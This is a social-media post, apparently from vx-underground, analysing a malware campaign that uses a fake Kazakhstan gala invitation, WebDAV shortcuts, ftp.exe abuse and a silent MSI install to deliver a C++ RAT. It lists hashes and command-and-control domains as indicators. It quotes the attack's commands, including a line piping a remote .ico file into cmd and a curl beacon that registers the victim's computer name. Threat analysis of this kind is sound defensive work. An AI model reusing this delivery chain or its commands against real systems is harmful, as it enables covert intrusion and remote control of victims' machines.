TGViewer
vx-underground vx-underground @vxunderground · 52.2K subscribers
Post #9469 2.13K
Last time on Dragon Ball Z: someone sent me goop (malware) which successfully evaded their EDR and all AVs. It also passed everything on VirusTotal for static-analysis.

They sent it to me to bonk with a stick, bonking this whole thing would take me a long time, and I'm not going to do that. I wanted to determine what it was doing, etc.

My knowledge on state-sponsored activity and geopolitics in the CIS (Commonwealth of Independent States, ex-Soviet countries) is rusty. However, based on the nature of this goop I would be willing to bet 4 silly pictures of cats this is a state-sponsored malware campaign.

1. The file (a .rar) sent is a fake invitation to the AmCham Kazakhstan's 2026 Gala (or so I assume based on some Google searches) which is happening October 16th, 2026, in Astana, Kazakhstan

2. The file contains two files. A .xz file (unsure what it does still at this time, but it's a JPEG, not a real archive) and a .url file (internet shortcut). The internet shortcut is named "Scanned Image". Likely a masquerading technique.

3. The .url file connects via WebDAV to "file://rappellingaart.com@SSL/secure-docs/3". This directory contains a .lnk (Windows shortcut) and a .ico (Icon file).

4. This is a masquerading effort, the end user must execute the .lnk file to proceed to the remaining payload. The WebDAV appears as a regular directory in File Explorer on Windows

5. The .lnk executes FTP.exe inside System32 and passes the WebDAV path to the .ico file as a LOLBIN, as this: "ftp.exe -s:icon.ico"

6. The .ico acts as a command template and does "!more \\rappellingaart.com@SSL\secure-docs\res.ico|cmd"

7. The res.ico file, which is piped into CMD.exe, creates a series of scheduled tasks, most notably it connects to gomescareerplans(.)com and performs a CURL on the domain under /docs/?vid=%computername%" as a way to register the machine that it has been infected by their payload

8. The res.ico also references the WebDAV URL again and performs a silent installation of "Imp_Details.msi" from \\rappellingaart.com@SSL\secure-docs\Imp_Details.msi

9. Imp_Details.msi contains a section internally labeled Binary._2E9D1C8BAC5D0F288E61BF5987C52203

10. This section is a RAT written in C++. It has a lot of features, lots of different commands, way too much for me to reverse engineer quickly. However, it does internally perform a XOR on a string. It reveals the C2 for the RAT delivered is chestergreenfarming(.)com

Invitation .rar:
2fa7498a3bda849c8c5a0e0869708ff113379d54197109a5cdfaea0155e878c9

.Url which launches the WebDAV:
613b6569bd8a4cd75ab11ee9682dd690fabfb11d5c1103caf2ba086e006da034

Weird .xz:
fec4f301a1be36a42ec27208e13b5d1d3d0bbe0f1ab47bbab863a7ca9923c571

.ico file (stager):
c27ca16248e04f6535ae3e6d1670d740b3884f0fa64935ddfd39faf712f4175d

.ico (C2 register, task scheduler):
f1060a81c9f68d6f3d23e28f2a1af50fa18ecb9b0a763ca5dcd4b294b6a3593c

.MSI (pulled from .ico task scheduler):
4008c8f9e52d3e6fd7df4a980a9a78f46f2412ba2fda10a38aa92d338767c54c

.exe inside of .MSI:
5d8df4c2d08cff5f1c0de8eab56e47ae543bd5c6d2ef04573f61ebb9fbc65716

WebDAV:
rappellingaart(.)com

C2 register:
gomescareerplans(.)com

RAT C2:
chestergreenfarming(.)com
  • ❤ 49
  • 🔥 11
  • 🤓 4
  • 🎉 3
  • ❤‍🔥 2
  • 🫡 2
More from @vxunderground
  1. Oct 1, 2026Apologies to any government agency in advance if I bamboozled their espionage campaign. So…
  2. Oct 1, 2026Interestingly, this malware is very, very, VERY specifically directed toward individuals,…
  3. Oct 1, 2026> be me > get dm > "smelly i found goop" > wtf i love goop (malware) > "i work for a compa…
  4. Sep 30, 2026> mcdonalds rolling out new SUPER INTELLIGENCE > archy > INTELLIGENTLY changes pricing > s…
  5. Sep 30, 2026> be me > get on beep boop > us gov executive order > affects executive branch > CIA, ICE,…
  6. Sep 29, 2026FBI Director Kash Patel, and the FBI accounts on social media, been talking about ShinyHun…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →